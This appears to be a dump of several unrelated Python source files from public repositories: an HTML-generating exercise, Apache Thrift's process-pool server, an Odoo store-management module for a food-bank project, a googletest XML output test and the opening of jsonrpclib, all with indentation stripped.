refs/heads/master
|
cap09/listagem-09-08.py
|
1
|
f = {
"drama": ["Cidadão Kane", "O Poderoso Chefão"],
"comedia": ["Tempos Modernos", "American Pie", "Dr. Dolittle"],
"policial": ["Chuva Negra", "Desejo de Matar", "Difícil de Matar"],
"guerra": ["Rambo", "Platoon", "Tora!Tora!Tora"]
}
pagina = open("index.html", "w", encoding="utf-8")
pagina.write("<!DOCTYPE html>")
pagina.write("<html lang=\"en\">")
pagina.write("<head>")
pagina.write("<meta charset=\"UTF-8\">")
pagina.write("<title>Title</title>")
pagina.write("</head>")
pagina.write("<body>")
pagina.write("Olá")
for genero, filmes in f.items():
pagina.write(f"<h1>{genero}</h2>")
for filme in filmes:
pagina.write(f"<h2>{filme}</h2>")
pagina.write("</body>")
pagina.write("</html>")
pagina.close()
|
collinmsn/thrift
|
refs/heads/master
|
lib/py/src/server/TProcessPoolServer.py
|
47
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from multiprocessing import Process, Value, Condition
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
logger = logging.getLogger(__name__)
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
if not client:
continue
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception as x:
logger.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception as x:
logger.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception as x:
logger.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
|
ludwiktrammer/bestja
|
refs/heads/master
|
addons/bestja_stores/models.py
|
1
|
# -*- coding: utf-8 -*-
import re
import datetime
from openerp import models, fields, api, exceptions
class RetailChain(models.Model):
_name = 'bestja_stores.chain'
name = fields.Char(required=True)
class Store(models.Model):
_name = 'bestja_stores.store'
_inherit = [
'protected_fields.mixin',
'ir.needaction_mixin',
'message_template.mixin',
]
_protected_fields = ['state']
_permitted_groups = ['bestja_base.instance_admin']
STATES = [
('pending', u"oczekujący"),
('accepted', u"zaakceptowany"),
('rejected', u"odrzucony"),
]
@api.model
def _default_responsible(self):
return self.env['organization'].search([
('level', '=', 1),
'|', # noqa
('coordinator', '=', self.env.uid),
('children.coordinator', '=', self.env.uid),
])
@api.model
def _default_default_partner(self):
return self.env['organization'].search([
('level', '>=', 1),
('coordinator', '=', self.env.uid),
])
name = fields.Char(required=True, string=u"Nazwa")
state = fields.Selection(STATES, default='pending', required=True, string=u"Status")
chain = fields.Many2one('bestja_stores.chain', string=u"Sieć Handlowa")
chain_id = fields.Char(
groups='bestja_project_hierarchy.managers_level0',
string=u"ID sklepu",
)
address = fields.Char(required=True, string=u"Ulica i numer")
city = fields.Char(required=True, string=u"Miasto")
postal_code = fields.Char(size=6, required=True, string=u"Kod pocztowy")
voivodeship = fields.Many2one('volunteer.voivodeship', required=True, string=u"Województwo")
responsible = fields.Many2one(
'organization',
domain='''[
('level', '=', 1),
'|',
('coordinator', '=', uid),
'|',
('parent.coordinator', '=', uid),
('children.coordinator', '=', uid),
]''',
required=True,
default=_default_responsible,
string=u"BŻ odpowiedzialny",
)
default_partner = fields.Many2one(
'organization',
domain='''[
('level', '>=', 1),
'|',
('id', '=', responsible),
('parent', '=', responsible),
'|',
('coordinator', '=', uid),
'|',
('parent.coordinator', '=', uid),
('parent.parent.coordinator', '=', uid),
]''',
default=_default_default_partner, # default ;)
required=True,
string=u"Domyślny partner",
)
user_is_responsible = fields.Boolean(compute="_compute_user_is_responsible")
user_is_federation = fields.Boolean(compute="_compute_user_is_federation")
user_is_partner = fields.Boolean(compute="_compute_user_is_partner")
in_projects = fields.One2many('bestja_stores.store_in_project', inverse_name='store')
active = fields.Boolean(default=True)
@api.one
def set_accepted(self):
self.state = 'accepted'
self.send(
template='bestja_stores.msg_store_accepted',
recipients=self.default_partner.coordinator,
)
@api.one
def set_rejected(self):
self.state = 'rejected'
self.send(
template='bestja_stores.msg_store_rejected',
recipients=self.default_partner.coordinator,
sender=self.env.user,
)
@api.one
def archive(self):
if not self.user_is_responsible and not self.user_is_federation and not self.user_is_partner:
raise exceptions.AccessError("Nie masz uprawnień żeby archiwizować ten sklep!")
self.sudo().active = False
@api.one
@api.constrains('default_partner', 'responsible')
def _check_default_partner(self):
if self.default_partner.parent != self.responsible and self.default_partner != self.responsible:
raise exceptions.ValidationError("Domyślny partner musi podlegać wybranemu Bankowi Żywności!")
@api.one
@api.constrains('responsible')
def _check_responsible_level(self):
if self.responsible.level != 1:
raise exceptions.ValidationError("Organizacja odpowiedzialna musi być Bankiem!")
@api.one
@api.depends('responsible', 'responsible.coordinator')
def _compute_user_is_responsible(self):
"""
Is current user coordinator of a Bank responsible for this store.
"""
self.user_is_responsible = (self.responsible.coordinator.id == self.env.uid)
@api.one
@api.depends('responsible', 'responsible.parent')
def _compute_user_is_federation(self):
self.user_is_federation = (
self.responsible.parent.coordinator.id == self.env.uid and self.responsible.parent.level == 0
)
@api.one
@api.depends('default_partner', 'default_partner.coordinator')
def _compute_user_is_partner(self):
self.user_is_partner = (self.default_partner.coordinator.id == self.env.uid)
@api.model
def _needaction_domain_get(self):
"""
Show pending count in menu.
"""
if not self.user_has_groups('bestja_base.instance_admin'):
return False
return [
('state', '=', 'pending'),
]
@api.model
def create(self, vals):
record = super(Store, self).create(vals)
record.send_group(
template='bestja_stores.msg_new_store',
group='bestja_base.instance_admin',
)
return record
@api.model
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
# Adds a `__free_for_project__` domain operator. Yeah - adding a domain operator
# to a single model to support a particular case seems like an act of complete
# desperation. That's because it is an act of complete desperation.
#
# The problem is it seems there is no way to create an Odoo domain that
# would select objects that are NOT in many2many relation with a particular
# object.
#
# Example usage of the new operator:
# [('store', '__free_for_project__', project)]
#
# It will select stores that are free to use with the `project` (are not
# already reserved).
for i, arg in enumerate(args):
if isinstance(arg, (tuple, list)) and len(arg) == 3 and arg[1] == '__free_for_project__':
left, _, right = arg
project = self.env['bestja.project'].browse([right])
reserved_inprojects = self.env['bestja_stores.store_in_project'].search([
('top_project', '=', project.top_parent.id),
('state', 'not in', ['rejected', 'deactivated']),
])
reserved_stores = {record.store.id for record in reserved_inprojects}
args[i] = (left, 'not in', list(reserved_stores))
return super(Store, self)._search(
args=args,
offset=offset,
limit=limit,
order=order,
count=count,
access_rights_uid=access_rights_uid,
)
@api.one
def name_get(self):
name_string = ", ".join([self.name, self.address, self.city])
return (self.id, name_string)
class StoreInProject(models.Model):
_name = 'bestja_stores.store_in_project'
_inherit = [
'protected_fields.mixin',
'ir.needaction_mixin',
'message_template.mixin',
]
_protected_fields = ['state', 'proposed_by', 'time_deactivated']
_order = 'state'
STATES = [
('waiting_bank', u"oczekuje na bank"),
('waiting_partner', u"oczekuje na partnera"),
('rejected', u"odrzucony"),
('activated', u"aktywowany"),
('deactivated', u"dezaktywowany"),
('proposed', u"proponowany"),
('chain', u"wysłany do sieci"),
]
def _default_project(self):
if self.env.context.get('active_model') == 'bestja.project':
return self.env.context.get('active_id')
return self.env.context.get('default_project')
store = fields.Many2one(
'bestja_stores.store',
required=True,
domain='''[
('state', '=', 'accepted'),
('default_partner', '=', organization),
('id', '__free_for_project__', project),
]''', # a custom operator defined in Store's _search method
string=u"Sklep",
)
show_all_stores = fields.Boolean(
string=u"pokaż wszystkie sklepy Banku",
compute='_compute_show_all_stores',
inverse='_inverse_show_stores',
)
hide_used_stores = fields.Boolean(
string=u"ukryj wykorzystane w tej zbiórce",
compute='_compute_hide_used_stores',
inverse='_inverse_show_stores',
)
project = fields.Many2one(
'bestja.project',
required=True,
default=_default_project,
string="Projekt",
domain='''[
('use_stores', '=', True),
('organization', '=', organization),
('date_stop', '>=', current_date),
'|',
('organization.coordinator', '=', uid),
'|',
('manager', '=', uid),
'|',
('parent.organization.coordinator', '=', uid),
('parent.manager', '=', uid),
]''',
)
organization = fields.Many2one(
'organization',
compute='_compute_organization',
inverse='_inverse_organization',
required=True,
domain='''[
('level', '>=', 1),
('projects.top_parent', '=?', top_project),
'|',
('coordinator', '=', uid),
'|',
('projects.manager', '=', uid),
'|',
('parent.coordinator', '=', uid),
('parent.projects.manager', '=', uid),
]''',
string=u"Organizacja",
)
organization_name = fields.Char(related='organization.name', related_sudo=True, store=True, readonly=True, string=u"Nazwa organizacji")
proposed_by = fields.Many2one('organization', oldname='activated_by', string=u"Organizacja potwierdzająca")
proposed_time = fields.Datetime(string=u"Czas zaproponowania")
top_project = fields.Many2one(
'bestja.project',
related='project.top_parent',
store=True,
)
date_start = fields.Date(related='project.top_parent.date_start', readonly=True)
date_stop = fields.Date(related='project.top_parent.date_stop', readonly=True)
days = fields.One2many('bestja_stores.day', inverse_name='store')
state = fields.Selection(STATES, default='waiting_bank', required=True, string=u"Status aktywacji")
time_deactivated = fields.Datetime(string=u"Czas dezaktywacji")
name = fields.Char(related='store.name', store=True, readonly=True)
address = fields.Char(related='store.address', readonly=True)
city = fields.Char(related='store.city', store=True, readonly=True)
user_can_moderate = fields.Boolean(compute="_compute_user_can_moderate")
user_is_federation = fields.Boolean(compute="_compute_is_federation")
user_is_owner = fields.Boolean(compute="_compute_is_owner")
user_is_bank = fields.Boolean(compute="_compute_is_bank")
duplicated = fields.Char(compute="_compute_duplicated", string="Duplikat sklepu")
@api.multi
def display_state(self):
return dict(StoreInProject.STATES).get(self.state)
@api.model
def _needaction_domain_get(self):
"""
Show pending count in menu.
"""
return [
('state', 'in', ['waiting_bank', 'waiting_partner']),
'|', # noqa
('project.manager', '=', self.env.uid),
'|',
('project.organization.coordinator', '=', self.env.uid),
'|',
('project.parent.manager', '=', self.env.uid),
('project.parent.organization.coordinator', '=', self.env.uid),
]
@api.multi
def is_bank(self):
"""
Does the current user have privileges to act as bank
(organization level 1) overseeing current project?
"""
self.ensure_one()
authorised_uids_1 = [
self.sudo().project.organization.coordinator.id,
self.sudo().project.manager.id,
]
authorised_uids_2 = [
self.sudo().project.parent.organization.coordinator.id,
self.sudo().project.parent.manager.id,
]
return (self.env.uid in authorised_uids_1 and self.sudo().project.organization_level == 1) or \
(self.env.uid in authorised_uids_2 and self.sudo().project.organization_level == 2)
@api.one
@api.depends('project', 'project.parent')
def _compute_is_bank(self):
self.user_is_bank = self.is_bank()
@api.multi
def is_federation(self):
"""
Does the current user have privileges to act as federation
(organization level 0) overseeing current project?
"""
self.ensure_one()
authorised_uids = [
self.sudo().project.top_parent.organization.coordinator.id,
self.sudo().project.top_parent.manager.id,
]
return self.env.uid in authorised_uids and self.sudo().project.top_parent.organization_level == 0
@api.one
@api.depends('project', 'project.parent')
def _compute_is_federation(self):
self.user_is_federation = self.is_federation()
@api.multi
def is_owner(self):
"""
Does the current user have privileges to act as an owner
of the current project.
"""
self.ensure_one()
authorised_uids = [
self.sudo().project.organization.coordinator.id,
self.sudo().project.manager.id,
]
return self.env.uid in authorised_uids
@api.one
@api.depends('project')
def _compute_is_owner(self):
self.user_is_owner = self.is_owner()
@api.one
@api.depends('project', 'project.parent')
def _compute_user_can_moderate(self):
"""
Is current user authorized to moderate (accept/reject) the store?
"""
if self.state == 'waiting_bank':
self.user_can_moderate = self.is_bank() and self.sudo().project.organization_level == 2
elif self.state == 'waiting_partner':
self.user_can_moderate = self.is_owner() or self.is_bank()
elif self.state in ('proposed', 'chain', 'activated'):
self.user_can_moderate = self.is_owner() or self.is_bank() or self.is_federation()
else:
self.user_can_moderate = False
@api.one
@api.depends('top_project', 'store')
def _compute_duplicated(self):
"""
"duplikat" if there are previous StoresInProject in this project linked to the same store,
empty otherwise. Used as a column for the XLS export.
"""
stores = self.search([
('top_project', '=', self.top_project.id),
('state', 'not in', ['rejected', 'deactivated']),
('store', '=', self.store.id),
])
if len(stores) > 1 and stores[0].id != self.id:
self.duplicated = "duplikat"
else:
self.duplicated = ""
@api.one
def set_proposed(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby proponować ten sklep!")
self.sudo().state = 'proposed'
self.sudo().proposed_time = fields.Datetime.now()
if self.is_owner():
self.sudo().proposed_by = self.project.organization
elif self.is_bank():
self.sudo().proposed_by = self.project.parent.organization
else:
# This shouldn't really happen, but we can't forbid super user
# from doing anything, so theoretically speaking it might...
self.sudo().proposed_by = False
@api.one
def set_deactivated(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby dezaktywować ten sklep!")
self.send(
template='bestja_stores.msg_in_project_deactivated',
recipients=self.top_project.responsible_user,
)
self.sudo().state = 'deactivated'
self.sudo().time_deactivated = fields.Datetime.now()
@api.one
def set_rejected(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby dezaktywować ten sklep!")
if self.state in ('proposed', 'chain', 'activated'):
raise exceptions.AccessError("Uprzednio proponowany sklep nie może zostać odrzucony!")
if self.state == 'waiting_bank':
self.send(
template='bestja_stores.msg_in_project_rejected',
recipients=self.project.responsible_user,
)
self.sudo().state = 'rejected'
@api.one
@api.depends('project.organization')
def _compute_organization(self):
if isinstance(self.id, models.NewId):
# can't use sudo with draft models,
# changing enviroment loses their values
self.organization = self.project.organization
else:
self.organization = self.sudo().project.organization
@api.one
def _compute_show_all_stores(self):
self.show_all_stores = False
@api.one
def _compute_hide_used_stores(self):
self.show_all_stores = True
@api.one
def _inverse_show_stores(self):
# The field is used for temporary purposes,
# no need to store its value
pass
@api.one
def _inverse_organization(self):
"""
If project is readonly the onchange('organization') below is not enough.
"""
if self.project and self.project.organization != self.organization:
organization_project = self.env['bestja.project'].search([
('organization', '=', self.organization.id),
('top_parent', '=', self.project.top_parent.id),
])
self.project = organization_project.id
@api.onchange('organization')
def _onchange_organization(self):
"""
Change project to a one from the same project hierarchy,
but from the right organization.
"""
if not self.organization:
return # Leave the previous project information
if isinstance(self.project.id, models.NewId):
# self.project is in draft mode, which unfortunately means
# we can't access its id (and we need it!).
# Fortunately it also means that its the currently opened
# project and we can get its id from context :)
current_project = self.env.context.get('default_project')
project = self.env['bestja.project'].browse([current_project])
else:
project = self.project
if project:
organization_project = self.env['bestja.project'].search([
('organization', '=', self.organization.id),
('top_parent', '=', project.top_parent.id),
])
self.project = organization_project.id
@api.onchange('show_all_stores', 'hide_used_stores')
def _onchange_show_all_stores(self):
if self.show_all_stores and self.hide_used_stores:
store_domain = """[
('state', '=', 'accepted'),
('id', '__free_for_project__', project),
'|',
('responsible', '=', organization),
('responsible.children', '=', organization),
]"""
elif self.show_all_stores:
store_domain = """[
('state', '=', 'accepted'),
'|',
('responsible', '=', organization),
('responsible.children', '=', organization),
]"""
else:
self.hide_used_stores = True
store_domain = self._fields['store'].domain
return {
'domain': {
'store': store_domain,
}
}
@api.one
@api.constrains('project', 'store')
def _check_free_for_project(self):
"""
Check if chosen store is free to be used in this project.
"""
if self.is_bank() or self.is_federation():
return # Bank can overwrite this
is_free = self.store.search_count([
('id', '=', self.store.id),
('id', '__free_for_project__', self.project.id),
])
if not is_free:
raise exceptions.ValidationError("Wybrany sklep jest już wykorzystany w tym projekcie!")
@api.model
def create(self, vals):
record = super(StoreInProject, self).create(vals)
if record.organization.level == 1 and record.is_owner():
# Middle organization adding for itself
record.sudo().state = 'proposed'
record.sudo().proposed_time = fields.Datetime.now()
record.sudo().proposed_by = record.project.organization.id
elif record.organization.level == 2:
if record.is_bank():
# Middle organization adding for its child
record.sudo().state = 'waiting_partner'
else:
record.sudo().state = 'waiting_bank'
else:
raise exceptions.AccessError("Nie masz uprawnień aby przypisać ten sklep!")
if not record.days:
# No days defined. Add the default set.
record.add_days()
return record
@api.multi
def write(self, vals):
if 'store' in vals:
raise exceptions.ValidationError("Pole sklep nie może być modyfikowane!")
if ('project' in vals or 'organization' in vals) and not self.is_bank() and not self.is_federation():
raise exceptions.ValidationError("Nie masz uprawnień żeby modyfikować pola projekt i organizacja!")
return super(StoreInProject, self).write(vals)
@api.one
def add_days(self):
"""
Create `bestja_stores.day` objects for all days in the project.
"""
# Find a previous time an event was held in the store.
# We want to find the second (yes!) day of the last event.
# This will be used to copy default values for from / to times.
previous_day = self.env['bestja_stores.day'].search(
[
('store.store', '=', self.store.id),
('store.state', '=', 'activated'),
],
order='store desc, date',
limit=2,
)
previous_day = previous_day[1] if len(previous_day) > 1 else previous_day
delta = datetime.timedelta(days=1)
day = fields.Date.from_string(self.date_start)
last_day = fields.Date.from_string(self.date_stop)
while day <= last_day:
self.env['bestja_stores.day'].create({
'store': self.id,
'date': fields.Date.to_string(day),
'time_from': previous_day.time_from or "09:00",
'time_to': previous_day.time_to or "18:00",
})
day += delta
@api.one
def add_days_dummy(self):
"""
Action for a "Add days" button. But we add days on create anyway, so it
doesn't actually have to do anything.
"""
pass
@api.one
def name_get(self):
name_string = u"{store} ({project})".format(store=self.store.name, project=self.project.name)
return (self.id, name_string)
def _auto_init(self, cr, context=None):
todo_end = super(StoreInProject, self)._auto_init(cr, context)
# Add UNIQUE index, since UNIQUE indexes (in opposite to UNIQUE constraints)
# can include conditional clauses.
if self._auto:
cr.execute("DROP INDEX IF EXISTS unique_store_project;")
cr.execute(
"""CREATE UNIQUE INDEX unique_store_project
ON bestja_stores_store_in_project(project,store)
WHERE (state NOT IN ('rejected', 'deactivated'));""")
# Custom error message
self.pool._sql_error['unique_store_project'] = \
"Ten sklep jest już przypisany w tym projekcie do tej organizacji!"
return todo_end
class DayInStore(models.Model):
_name = 'bestja_stores.day'
_order = 'date'
store = fields.Many2one(
'bestja_stores.store_in_project',
required=True,
ondelete='cascade',
string=u"Sklep",
)
date = fields.Date(
required=True,
string=u"Dzień zbiórki",
)
time_from = fields.Char(
string=u"Start"
)
time_to = fields.Char(
string=u"Koniec",
)
# Computed versions of the above fields, to be able to
# provide store specific defaults
time_from_default = fields.Char(
required=True,
compute='_compute_time_from',
inverse='_inverse_time_from',
string=u"Start"
)
time_to_default = fields.Char(
required=True,
compute='_compute_time_to',
inverse='_inverse_time_to',
string=u"Koniec",
)
previous_day = fields.Many2one(
'bestja_stores.day',
compute='_compute_previous_day',
)
_sql_constraints = [
('date_uniq', 'unique(date, store)', 'Można podać tylko jedną datę zbiórki dla danego sklepu!')
]
@api.one
@api.depends('store.store')
def _compute_previous_day(self):
"""
Previously accepted day in the same store,
needed for default hours. We want to find
the second (yes!) day of the last event.
"""
previous_day = self.env['bestja_stores.day'].search(
[
('store.store', '=', self.store.store.id),
('store.state', '=', 'activated'),
],
order='store desc, date',
limit=2,
)
self.previous_day = previous_day[1].id if len(previous_day) > 1 else previous_day.id
@api.one
@api.depends('time_from', 'previous_day', 'store')
def _compute_time_from(self):
"""
If time_from is set just present it.
If not present a default value - the previous time
from the same store in the most recent project.
"""
if self.time_from:
self.time_from_default = self.time_from
else:
self.time_from_default = self.previous_day.time_from
@api.one
@api.depends('time_to', 'previous_day', 'store')
def _compute_time_to(self):
"""
If time_to is set just present it.
If not present a default value - the previous time
from the same store in the most recent project.
"""
if self.time_to:
self.time_to_default = self.time_to
else:
self.time_to_default = self.previous_day.time_to
@api.one
def _inverse_time_from(self):
self.time_from = self.time_from_default
@api.one
def _inverse_time_to(self):
self.time_to = self.time_to_default
@api.one
@api.constrains('time_from', 'time_to')
def _check_hours(self):
time_pattern = re.compile(r"^([0-1][0-9]|2[0-4]):[0-5][0-9]$")
if not time_pattern.match(self.time_to_default) or not time_pattern.match(self.time_from_default):
raise exceptions.ValidationError("Godzina musi być podana w formacie hh:mm!")
@api.one
@api.constrains('date')
def _check_date_in_project(self):
if not self.store.top_project.date_start <= self.date <= self.store.top_project.date_stop:
raise exceptions.ValidationError("Wybrano dzień poza czasem trwania projektu!")
class ProjectWithStores(models.Model):
_inherit = 'bestja.project'
stores = fields.One2many(
'bestja_stores.store_in_project',
inverse_name='project',
groups='bestja_project.managers',
)
enable_stores = fields.Boolean(string=u"Projekt zbiórkowy?")
use_stores = fields.Boolean(
compute='_compute_use_stores',
compute_sudo=True,
search='_search_use_stores',
)
@api.one
@api.depends('enable_stores', 'parent.enable_stores', 'parent.parent.enable_stores')
def _compute_use_stores(self):
self.use_stores = (
self.enable_stores or
self.parent.enable_stores or
self.parent.parent.enable_stores
)
def _search_use_stores(self, operator, value):
return [
'|', # noqa
('enable_stores', operator, value),
'|',
('parent.enable_stores', operator, value),
('parent.parent.enable_stores', operator, value),
]
|
codeman38/toggldesktop
|
refs/heads/master
|
third_party/googletest-read-only/test/gtest_xml_outfiles_test.py
|
2526
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module."""
__author__ = "keith.ray@gmail.com (Keith Ray)"
import os
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_SUBDIR = "xml_outfiles"
GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_"
GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_"
EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne" SetUpProp="1" TestSomeProperty="1" TearDownProp="1" />
</testsuite>
</testsuites>
"""
EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo" SetUpProp="2" TestSomeProperty="2" TearDownProp="2" />
</testsuite>
</testsuites>
"""
class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase):
"""Unit test for Google Test's XML output functionality."""
def setUp(self):
# We want the trailing '/' that the last "" provides in os.path.join, for
# telling Google Test to create an output directory instead of a single file
# for xml output.
self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_OUTPUT_SUBDIR, "")
self.DeleteFilesAndDir()
def tearDown(self):
self.DeleteFilesAndDir()
def DeleteFilesAndDir(self):
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml"))
except os.error:
pass
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml"))
except os.error:
pass
try:
os.rmdir(self.output_dir_)
except os.error:
pass
def testOutfile1(self):
self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1)
def testOutfile2(self):
self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2)
def _TestOutFile(self, test_name, expected_xml):
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name)
command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_]
p = gtest_test_utils.Subprocess(command,
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
# TODO(wan@google.com): libtool causes the built test binary to be
# named lt-gtest_xml_outfiles_test_ instead of
# gtest_xml_outfiles_test_. To account for this possibillity, we
# allow both names in the following code. We should remove this
# hack when Chandler Carruth's libtool replacement tool is ready.
output_file_name1 = test_name + ".xml"
output_file1 = os.path.join(self.output_dir_, output_file_name1)
output_file_name2 = 'lt-' + output_file_name1
output_file2 = os.path.join(self.output_dir_, output_file_name2)
self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2),
output_file1)
expected = minidom.parseString(expected_xml)
if os.path.isfile(output_file1):
actual = minidom.parse(output_file1)
else:
actual = minidom.parse(output_file2)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == "__main__":
os.environ["GTEST_STACK_TRACE_DEPTH"] = "0"
gtest_test_utils.Main()
|
badloop/SickRage
|
refs/heads/master
|
lib/jsonrpclib/jsonrpc.py
|
68
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
============================
JSONRPC Library (jsonrpclib)
============================
This library is a JSON-RPC v.2 (proposed) implementation which
follows the xmlrpclib API for portability between clients. It
uses the same Server / ServerProxy, loads, dumps, etc. syntax,
while providing features not present in XML-RPC like:
* Keyword arguments
* Notifications
* Versioning
* Batches and batch notifications
Eventually, I'll add a SimpleXMLRPCServer compatible library,
and other things to tie the thing off nicely. :)
For a quick-start, just open a console and type the following,
replacing the server address, method, and parameters
appropriately.
>>> import jsonrpclib
>>> server = jsonrpclib.Server('http://localhost:8181')
>>> server.add(5, 6)
11
>>> server._notify.add(5, 6)
>>> batch = jsonrpclib.MultiCall(server)
>>> batch.add(3, 50)
>>> batch.add(2, 3)
>>> batch._notify.add(3, 5)
>>> batch()
[53, 5]
See http://code.google.com/p/jsonrpclib/ for more info.
"""
import types
import sys
from xmlrpclib import Transport as XMLTransport
from xmlrpclib import SafeTransport as XMLSafeTransport
from xmlrpclib import ServerProxy as XMLServerProxy
from xmlrpclib import _Method as XML_Method
import time
import string
import random
# Library includes
import jsonrpclib
from jsonrpclib import config
from jsonrpclib import history
# JSON library importing
cjson = None
json = None
try:
import cjson
except ImportError:
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
raise ImportError(
'You must have the cjson, json, or simplejson ' +
'module(s) available.'
)
IDCHARS = string.ascii_lowercase+string.digits
class UnixSocketMissing(Exception):
"""
Just a properly named Exception if Unix Sockets usage is
attempted on a platform that doesn't support them (Windows)
"""
pass
#JSON Abstractions
def jdumps(obj, encoding='utf-8'):
# Do 'serialize' test at some point for other classes
global cjson
if cjson:
return cjson.encode(obj)
else:
return json.dumps(obj, encoding=encoding)
def jloads(json_string):
global cjson
if cjson:
return cjson.decode(json_string)
else:
return json.loads(json_string)
# XMLRPClib re-implementations
class ProtocolError(Exception):
pass
class TransportMixIn(object):
""" Just extends the XMLRPC transport where necessary. """
user_agent = config.user_agent
# for Python 2.7 support
_connection = None
def send_content(self, connection, request_body):
connection.putheader("Content-Type", "application/json-rpc")
connection.putheader("Content-Length", str(len(request_body)))
connection.endheaders()
if request_body:
connection.send(request_body)
